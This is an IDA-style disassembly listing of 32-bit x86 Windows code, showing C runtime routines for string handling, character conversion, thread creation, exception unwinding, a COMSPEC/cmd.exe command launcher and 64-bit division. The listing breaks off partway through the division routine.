; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42AA81 proc near ; CODE XREF: sub_42AA24+39�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
push ebx
push esi
xor esi, esi
xor eax, eax
cmp edx, esi
push edi
jz loc_42AB4F
mov edi, [ebp+arg_8]
cmp edi, esi
jz loc_42AB7C
cmp dword_6769A8, esi
jnz short loc_42AAD2
cmp edi, esi
jbe loc_42AB7C
loc_42AAB1: ; CODE XREF: sub_42AA81+4A�j
mov ecx, [ebp+arg_4]
add ecx, eax
movzx si, byte ptr [ecx]
mov [edx], si
cmp byte ptr [ecx], 0
jz loc_42AB7C
inc eax
inc edx
inc edx
cmp eax, edi
jb short loc_42AAB1
jmp loc_42AB7C
; ---------------------------------------------------------------------------
loc_42AAD2: ; CODE XREF: sub_42AA81+26�j
mov ebx, [ebp+arg_4]
mov esi, dword_437184
push edi
push edx
push 0FFFFFFFFh
push ebx
push 9
push dword_6769B8
call esi ; dword_437184
test eax, eax
jnz loc_42AB7B
call dword_437170 ; RtlGetLastWin32Error
cmp eax, 7Ah
jz short loc_42AB0D
loc_42AAFD: ; CODE XREF: sub_42AA81+CC�j
; sub_42AA81+F8�j
call sub_42F119
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp short loc_42AB7C
; ---------------------------------------------------------------------------
loc_42AB0D: ; CODE XREF: sub_42AA81+7A�j
lea ecx, [edi-1]
mov eax, ebx
mov [ebp+arg_4], ecx
loc_42AB15: ; CODE XREF: sub_42AA81+B4�j
mov cl, [eax]
test cl, cl
jz short loc_42AB37
mov edx, off_4533B8
movzx ecx, cl
test byte ptr [edx+ecx*2+1], 80h
jz short loc_42AB2C
inc eax
loc_42AB2C: ; CODE XREF: sub_42AA81+A8�j
mov ecx, [ebp+arg_4]
inc eax
dec [ebp+arg_4]
test ecx, ecx
jnz short loc_42AB15
loc_42AB37: ; CODE XREF: sub_42AA81+98�j
push edi
sub eax, ebx
push [ebp+arg_0]
push eax
push ebx
push 1
push dword_6769B8
call esi ; dword_437184
test eax, eax
jnz short loc_42AB7C
jmp short loc_42AAFD
; ---------------------------------------------------------------------------
loc_42AB4F: ; CODE XREF: sub_42AA81+F�j
cmp dword_6769A8, esi
jnz short loc_42AB62
push [ebp+arg_4]
call sub_4293A0
pop ecx
jmp short loc_42AB7C
; ---------------------------------------------------------------------------
loc_42AB62: ; CODE XREF: sub_42AA81+D4�j
push esi
push esi
push 0FFFFFFFFh
push [ebp+arg_4]
push 9
push dword_6769B8
call dword_437184 ; MultiByteToWideChar
cmp eax, esi
jz short loc_42AAFD
loc_42AB7B: ; CODE XREF: sub_42AA81+6B�j
dec eax
loc_42AB7C: ; CODE XREF: sub_42AA81+1A�j
; sub_42AA81+2A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_42AA81 endp
; =============== S U B R O U T I N E =======================================
sub_42AB81 proc near ; CODE XREF: sub_409FAF+B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
push 74h
push 1
xor edi, edi
call sub_42B39A
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_42ABDC
push esi
call sub_42E4DB
mov eax, [esp+0Ch+arg_0]
pop ecx
push esi
push 4
push esi
push offset sub_42ABF8
push [esp+18h+arg_4]
mov [esi+48h], eax
mov eax, [esp+1Ch+arg_8]
push edi
mov [esi+4Ch], eax
call dword_437180 ; CreateThread
mov edi, eax
test edi, edi
mov [esi+4], edi
jz short loc_42ABD4
push edi
call dword_437228 ; ResumeThread
cmp eax, 0FFFFFFFFh
jnz short loc_42ABF3
loc_42ABD4: ; CODE XREF: sub_42AB81+45�j
call dword_437170 ; RtlGetLastWin32Error
mov edi, eax
loc_42ABDC: ; CODE XREF: sub_42AB81+13�j
push esi
call sub_4298F2
test edi, edi
pop ecx
jz short loc_42ABEE
push edi
call sub_42F0A6
pop ecx
loc_42ABEE: ; CODE XREF: sub_42AB81+64�j
or eax, 0FFFFFFFFh
jmp short loc_42ABF5
; ---------------------------------------------------------------------------
loc_42ABF3: ; CODE XREF: sub_42AB81+51�j
mov eax, edi
loc_42ABF5: ; CODE XREF: sub_42AB81+70�j
pop edi
pop esi
retn
sub_42AB81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42ABF8 proc near ; DATA XREF: sub_42AB81+24�o
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437438
push offset sub_42ADC4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov esi, [ebp+arg_0]
push esi
push dword_453240
call dword_43722C ; TlsSetValue
test eax, eax
jnz short loc_42AC3A
push 10h
call sub_42C67C
pop ecx
loc_42AC3A: ; CODE XREF: sub_42ABF8+38�j
mov eax, off_450E6C
test eax, eax
jz short loc_42AC45
call eax ; nullsub_2
loc_42AC45: ; CODE XREF: sub_42ABF8+49�j
and [ebp+var_4], 0
push dword ptr [esi+4Ch]
call dword ptr [esi+48h]
pop ecx
call sub_42AC8B
or [ebp+var_4], 0FFFFFFFFh
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_42ABF8 endp
; ---------------------------------------------------------------------------
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-1Ch], ecx
push eax
push ecx
call sub_430C27
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-1Ch]
call sub_430B45
; =============== S U B R O U T I N E =======================================
sub_42AC8B proc near ; CODE XREF: sub_42ABF8+58�p
mov eax, off_450E70
test eax, eax
jz short loc_42AC96
call eax ; nullsub_2
loc_42AC96: ; CODE XREF: sub_42AC8B+7�j
push esi
call sub_42E4EE
mov esi, eax
test esi, esi
jnz short loc_42ACAA
push 10h
call sub_42C67C
pop ecx
loc_42ACAA: ; CODE XREF: sub_42AC8B+15�j
mov eax, [esi+4]
cmp eax, 0FFFFFFFFh
jz short loc_42ACB9
push eax
call dword_437044 ; CloseHandle
loc_42ACB9: ; CODE XREF: sub_42AC8B+25�j
push esi
call sub_42E555
pop ecx
push 0
call dword_437174 ; ExitThread
pop esi
retn
sub_42AC8B endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42ACCC proc near ; CODE XREF: sub_42ADC4+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_42ACE4
push [ebp+arg_0]
call sub_436300 ; RtlUnwind
loc_42ACE4: ; DATA XREF: sub_42ACCC+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_42ACCC endp
; =============== S U B R O U T I N E =======================================
sub_42ACEC proc near ; DATA XREF: sub_42AD0E+A�o
; sub_42AD76+9�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_42AD0D
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_42AD0D: ; CODE XREF: sub_42ACEC+10�j
retn
sub_42ACEC endp
; =============== S U B R O U T I N E =======================================
sub_42AD0E proc near ; CODE XREF: sub_42ADC4+67�p
; sub_42ADC4+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_42ACEC
push large dword ptr fs:0
mov large fs:0, esp
loc_42AD2B: ; CODE XREF: sub_42AD0E:loc_42AD66�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_42AD68
cmp esi, [esp+1Ch+arg_4]
jz short loc_42AD68
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_42AD66
push 101h
mov eax, [ebx+esi*4+8]
call sub_42ADA2
call dword ptr [ebx+esi*4+8]
loc_42AD66: ; CODE XREF: sub_42AD0E+44�j
jmp short loc_42AD2B
; ---------------------------------------------------------------------------
loc_42AD68: ; CODE XREF: sub_42AD0E+2A�j
; sub_42AD0E+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_42AD0E endp
; =============== S U B R O U T I N E =======================================
sub_42AD76 proc near ; CODE XREF: sub_4318B1+3F�p
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_42ACEC
jnz short locret_42AD98
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_42AD98
mov eax, 1
locret_42AD98: ; CODE XREF: sub_42AD76+10�j
; sub_42AD76+1B�j
retn
sub_42AD76 endp
; =============== S U B R O U T I N E =======================================
sub_42AD99 proc near ; CODE XREF: sub_431B80+1E�p
; sub_431B80+40�p
push ebx
push ecx
mov ebx, offset dword_450E74
jmp short loc_42ADAC
sub_42AD99 endp
; =============== S U B R O U T I N E =======================================
sub_42ADA2 proc near ; CODE XREF: sub_42AD0E+4F�p
; sub_42ADC4+78�p
push ebx
push ecx
mov ebx, offset dword_450E74
mov ecx, [ebp+8]
loc_42ADAC: ; CODE XREF: sub_42AD99+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_42ADA2 endp
; ---------------------------------------------------------------------------
align 4
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42ADC4 proc near ; DATA XREF: .text:0040A51E�o
; sub_40A5A4+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_42AE64
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_42ADF7: ; CODE XREF: sub_42ADC4+90�j
cmp esi, 0FFFFFFFFh
jz short loc_42AE5D
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_42AE4B
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_42AE4B
js short loc_42AE56
mov edi, [ebx+8]
push ebx
call sub_42ACCC
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_42AD0E
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_42ADA2
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_42AE4B: ; CODE XREF: sub_42ADC4+40�j
; sub_42ADC4+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_42ADF7
; ---------------------------------------------------------------------------
loc_42AE56: ; CODE XREF: sub_42ADC4+54�j
mov eax, 0
jmp short loc_42AE79
; ---------------------------------------------------------------------------
loc_42AE5D: ; CODE XREF: sub_42ADC4+36�j
mov eax, 1
jmp short loc_42AE79
; ---------------------------------------------------------------------------
loc_42AE64: ; CODE XREF: sub_42ADC4+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_42AD0E
add esp, 8
pop ebp
mov eax, 1
loc_42AE79: ; CODE XREF: sub_42ADC4+97�j
; sub_42ADC4+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_42ADC4 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_42AD0E
add esp, 8
pop ebp
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_42AEA0 proc near ; CODE XREF: sub_40A62E+29�p
; sub_40A662+92�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_42AF1A
mov dh, [ecx+1]
test dh, dh
jz short loc_42AF07
loc_42AEB8: ; CODE XREF: sub_42AEA0+52�j
; sub_42AEA0+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_42AEDA
test al, al
jz short loc_42AED4
loc_42AEC9: ; CODE XREF: sub_42AEA0+32�j
mov al, [esi]
inc esi
loc_42AECC: ; CODE XREF: sub_42AEA0+3F�j
cmp al, dl
jz short loc_42AEDA
test al, al
jnz short loc_42AEC9
loc_42AED4: ; CODE XREF: sub_42AEA0+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_42AEDA: ; CODE XREF: sub_42AEA0+23�j
; sub_42AEA0+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_42AECC
lea edi, [esi-1]
loc_42AEE4: ; CODE XREF: sub_42AEA0+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_42AF13
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_42AEB8
mov al, [ecx+3]
test al, al
jz short loc_42AF13
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_42AEE4
jmp short loc_42AEB8
; ---------------------------------------------------------------------------
loc_42AF07: ; CODE XREF: sub_42AEA0+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_42B1A6
; ---------------------------------------------------------------------------
loc_42AF13: ; CODE XREF: sub_42AEA0+49�j
; sub_42AEA0+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_42AF1A: ; CODE XREF: sub_42AEA0+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_42AEA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42AF20 proc near ; CODE XREF: sub_40A9FE+869C�p
; sub_40A9FE+86A6�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push esi
xor esi, esi
cmp dword_6769A8, esi
push edi
mov [ebp+var_8], esi
jnz short loc_42AF5E
mov eax, [ebp+arg_0]
mov edx, eax
cmp byte ptr [eax], 0
jz loc_42B050
loc_42AF42: ; CODE XREF: sub_42AF20+37�j
mov cl, [edx]
cmp cl, 41h
jl short loc_42AF53
cmp cl, 5Ah
jg short loc_42AF53
add cl, 20h
mov [edx], cl
loc_42AF53: ; CODE XREF: sub_42AF20+27�j
; sub_42AF20+2C�j
inc edx
cmp byte ptr [edx], 0
jnz short loc_42AF42
jmp loc_42B050
; ---------------------------------------------------------------------------
loc_42AF5E: ; CODE XREF: sub_42AF20+12�j
mov edi, offset dword_676EDC
push edi
call dword_437224 ; InterlockedIncrement
cmp dword_676ED8, esi
jz short loc_42AF8A
push edi
call dword_437220 ; InterlockedDecrement
push 13h
call sub_42DAEF
pop ecx
mov [ebp+var_4], 1
jmp short loc_42AF8D
; ---------------------------------------------------------------------------
loc_42AF8A: ; CODE XREF: sub_42AF20+50�j
mov [ebp+var_4], esi
loc_42AF8D: ; CODE XREF: sub_42AF20+68�j
mov eax, dword_6769A8
cmp eax, esi
jnz short loc_42AFD3
cmp [ebp+var_4], esi
jz short loc_42AFA5
push 13h
call sub_42DB50
pop ecx
jmp short loc_42AFAC
; ---------------------------------------------------------------------------
loc_42AFA5: ; CODE XREF: sub_42AF20+79�j
push edi
call dword_437220 ; InterlockedDecrement
loc_42AFAC: ; CODE XREF: sub_42AF20+83�j
mov eax, [ebp+arg_0]
mov edx, eax
cmp byte ptr [eax], 0
jz loc_42B050
loc_42AFBA: ; CODE XREF: sub_42AF20+AF�j
mov cl, [edx]
cmp cl, 41h
jl short loc_42AFCB
cmp cl, 5Ah
jg short loc_42AFCB
add cl, 20h
mov [edx], cl
loc_42AFCB: ; CODE XREF: sub_42AF20+9F�j
; sub_42AF20+A4�j
inc edx
cmp byte ptr [edx], 0
jnz short loc_42AFBA
jmp short loc_42B050
; ---------------------------------------------------------------------------
loc_42AFD3: ; CODE XREF: sub_42AF20+74�j
push ebx
push 1
push esi
push esi
push esi
push 0FFFFFFFFh
push [ebp+arg_0]
mov esi, 100h
push esi
push eax
call sub_430D9F
mov ebx, eax
add esp, 20h
test ebx, ebx
jz short loc_42B02C
push ebx
call sub_4297B8
test eax, eax
pop ecx
mov [ebp+var_8], eax
jz short loc_42B02C
push 1
push 0
push ebx
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push esi
push dword_6769A8
call sub_430D9F
add esp, 20h
test eax, eax
jz short loc_42B02C
push [ebp+var_8]
push [ebp+arg_0]
call sub_42A5D0
pop ecx
pop ecx
loc_42B02C: ; CODE XREF: sub_42AF20+D1�j
; sub_42AF20+DF�j ...
cmp [ebp+var_4], 0
pop ebx
jz short loc_42B03D
push 13h
call sub_42DB50
pop ecx
jmp short loc_42B044
; ---------------------------------------------------------------------------
loc_42B03D: ; CODE XREF: sub_42AF20+111�j
push edi
call dword_437220 ; InterlockedDecrement
loc_42B044: ; CODE XREF: sub_42AF20+11B�j
push [ebp+var_8]
call sub_4298F2
mov eax, [ebp+arg_0]
pop ecx
loc_42B050: ; CODE XREF: sub_42AF20+1C�j
; sub_42AF20+39�j ...
pop edi
pop esi
leave
retn
sub_42AF20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B060 proc near ; CODE XREF: sub_40A9FE+620B�p
; sub_40A9FE+6230�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
inc ecx
neg ecx
dec edi
mov al, [ebp+arg_4]
std
repne scasb
inc edi
cmp [edi], al
jz short loc_42B081
xor eax, eax
jmp short loc_42B083
; ---------------------------------------------------------------------------
loc_42B081: ; CODE XREF: sub_42B060+1B�j
mov eax, edi
loc_42B083: ; CODE XREF: sub_42B060+1F�j
cld
pop edi
leave
retn
sub_42B060 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B087 proc near ; CODE XREF: sub_40A9FE+4B19�p
; sub_424EAB+12B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
push ebx
mov ebx, [ebp+arg_0]
push edi
mov edi, ebx
jg short loc_42B09B
xor eax, eax
jmp short loc_42B0E5
; ---------------------------------------------------------------------------
loc_42B09B: ; CODE XREF: sub_42B087+E�j
push esi
mov esi, [ebp+arg_8]
push esi
call sub_42C1D4
pop ecx
loc_42B0A6: ; CODE XREF: sub_42B087+46�j
dec [ebp+arg_4]
jz short loc_42B0D8
dec dword ptr [esi+4]
js short loc_42B0BA
mov ecx, [esi]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_42B0C1
; ---------------------------------------------------------------------------
loc_42B0BA: ; CODE XREF: sub_42B087+27�j
push esi
call sub_42F3E2
pop ecx
loc_42B0C1: ; CODE XREF: sub_42B087+31�j
cmp eax, 0FFFFFFFFh
jz short loc_42B0CF
mov [edi], al
inc edi
cmp al, 0Ah
jz short loc_42B0D8
jmp short loc_42B0A6
; ---------------------------------------------------------------------------
loc_42B0CF: ; CODE XREF: sub_42B087+3D�j
cmp edi, [ebp+arg_0]
jnz short loc_42B0D8
xor ebx, ebx
jmp short loc_42B0DB
; ---------------------------------------------------------------------------
loc_42B0D8: ; CODE XREF: sub_42B087+22�j
; sub_42B087+44�j ...
and byte ptr [edi], 0
loc_42B0DB: ; CODE XREF: sub_42B087+4F�j
push esi
call sub_42C226
pop ecx
mov eax, ebx
pop esi
loc_42B0E5: ; CODE XREF: sub_42B087+12�j
pop edi
pop ebx
pop ebp
retn
sub_42B087 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B0E9 proc near ; CODE XREF: sub_40A9FE+46CD�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push offset aComspec ; "COMSPEC"
call sub_4312C2
pop ecx
xor esi, esi
mov ecx, [ebp+arg_0]
mov [ebp+var_10], eax
cmp ecx, esi
jnz short loc_42B120
cmp eax, esi
jnz short loc_42B110
xor eax, eax
jmp short loc_42B187
; ---------------------------------------------------------------------------
loc_42B110: ; CODE XREF: sub_42B0E9+21�j
push esi
push eax
call sub_42A6C0
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_42B187
; ---------------------------------------------------------------------------
loc_42B120: ; CODE XREF: sub_42B0E9+1D�j
cmp eax, esi
mov [ebp+var_C], offset dword_437450
mov [ebp+var_8], ecx
mov [ebp+var_4], esi
jz short loc_42B15F
lea ecx, [ebp+var_10]
push esi
push ecx
push eax
push esi
call sub_431128
mov edi, eax
add esp, 10h
cmp edi, 0FFFFFFFFh
jnz short loc_42B15B
call sub_42F119
cmp dword ptr [eax], 2
jz short loc_42B15F
call sub_42F119
cmp dword ptr [eax], 0Dh
jz short loc_42B15F
loc_42B15B: ; CODE XREF: sub_42B0E9+5C�j
mov eax, edi
jmp short loc_42B187
; ---------------------------------------------------------------------------
loc_42B15F: ; CODE XREF: sub_42B0E9+46�j
; sub_42B0E9+66�j ...
test byte_6769D1, 80h
mov [ebp+var_10], offset dword_437444
jnz short loc_42B176
mov [ebp+var_10], offset aCmd_exe ; "cmd.exe"
loc_42B176: ; CODE XREF: sub_42B0E9+84�j
lea eax, [ebp+var_10]
push esi
push eax
push [ebp+var_10]
push esi
call sub_430FC3
add esp, 10h
loc_42B187: ; CODE XREF: sub_42B0E9+25�j
; sub_42B0E9+35�j ...
pop edi
pop esi
leave
retn
sub_42B0E9 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_42B1A0
loc_42B190: ; CODE XREF: sub_42B1A0+1D�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_42B1A0
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_42B1A0 proc near ; CODE XREF: sub_40A9FE+4682�p
; sub_40A9FE+603F�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 0042B190 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_42B1A6: ; CODE XREF: sub_42AEA0+6E�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_42B1CB
loc_42B1B8: ; CODE XREF: sub_42B1A0+29�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_42B190
test cl, cl
jz short loc_42B214
test edx, 3
jnz short loc_42B1B8
loc_42B1CB: ; CODE XREF: sub_42B1A0+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_42B1D6: ; CODE XREF: sub_42B1A0+61�j
; sub_42B1A0+70�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_42B218
and eax, 81010100h
jz short loc_42B1D6
and eax, 1010100h
jnz short loc_42B212
and esi, 80000000h
jnz short loc_42B1D6
loc_42B212: ; CODE XREF: sub_42B1A0+68�j
; sub_42B1A0+81�j ...
pop esi
pop edi
loc_42B214: ; CODE XREF: sub_42B1A0+21�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_42B218: ; CODE XREF: sub_42B1A0+5A�j
mov eax, [edx-4]
cmp al, bl
jz short loc_42B255
test al, al
jz short loc_42B212
cmp ah, bl
jz short loc_42B24E
test ah, ah
jz short loc_42B212
shr eax, 10h
cmp al, bl
jz short loc_42B247
test al, al
jz short loc_42B212
cmp ah, bl
jz short loc_42B240
test ah, ah
jz short loc_42B212
jmp short loc_42B1D6
; ---------------------------------------------------------------------------
loc_42B240: ; CODE XREF: sub_42B1A0+98�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_42B247: ; CODE XREF: sub_42B1A0+90�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_42B24E: ; CODE XREF: sub_42B1A0+85�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_42B255: ; CODE XREF: sub_42B1A0+7D�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_42B1A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_42B260 proc near ; CODE XREF: sub_40A9FE+A4C�p
; sub_431658+26�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_42B2AC
loc_42B270: ; CODE XREF: sub_42B260+3C�j
; sub_42B260+66�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_42B2A4
or al, al
jz short loc_42B2A0
cmp ah, [ecx+1]
jnz short loc_42B2A4
or ah, ah
jz short loc_42B2A0
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_42B2A4
or al, al
jz short loc_42B2A0
cmp ah, [ecx+3]
jnz short loc_42B2A4
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_42B270
mov edi, edi
loc_42B2A0: ; CODE XREF: sub_42B260+18�j
; sub_42B260+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_42B2A4: ; CODE XREF: sub_42B260+14�j
; sub_42B260+1D�j ...
sbb eax, eax
shl eax, 1
inc eax
retn
; ---------------------------------------------------------------------------
align 4
loc_42B2AC: ; CODE XREF: sub_42B260+E�j
test edx, 1
jz short loc_42B2C8
mov al, [edx]
inc edx
cmp al, [ecx]
jnz short loc_42B2A4
inc ecx
or al, al
jz short loc_42B2A0
test edx, 2
jz short loc_42B270
loc_42B2C8: ; CODE XREF: sub_42B260+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_42B2A4
or al, al
jz short loc_42B2A0
cmp ah, [ecx+1]
jnz short loc_42B2A4
or ah, ah
jz short loc_42B2A0
add ecx, 2
jmp short loc_42B270
sub_42B260 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_42B2F0 proc near ; CODE XREF: sub_40A9FE+190F�p
; sub_418FA1+10D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_42B311
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_42B311: ; CODE XREF: sub_42B2F0+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_42B32D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_42B32D: ; CODE XREF: sub_42B2F0+27�j
or eax, eax
jnz short loc_42B349
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_42B38A
; ---------------------------------------------------------------------------
loc_42B349: ; CODE XREF: sub_42B2F0+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_42B357: ; CODE XREF: sub_42B2F0+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_42B357
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_42B385
cmp edx, [esp+0Ch+arg_4]
ja short loc_42B385
jb short loc_42B386
cmp eax, [esp+0Ch+arg_0]
jbe short loc_42B386
loc_42B385: ; CODE XREF: sub_42B2F0+85�j
; sub_42B2F0+8B�j
dec esi
loc_42B386: ; CODE XREF: sub_42B2F0+8D�j
; sub_42B2F0+93�j
xor edx, edx
mov eax, esi
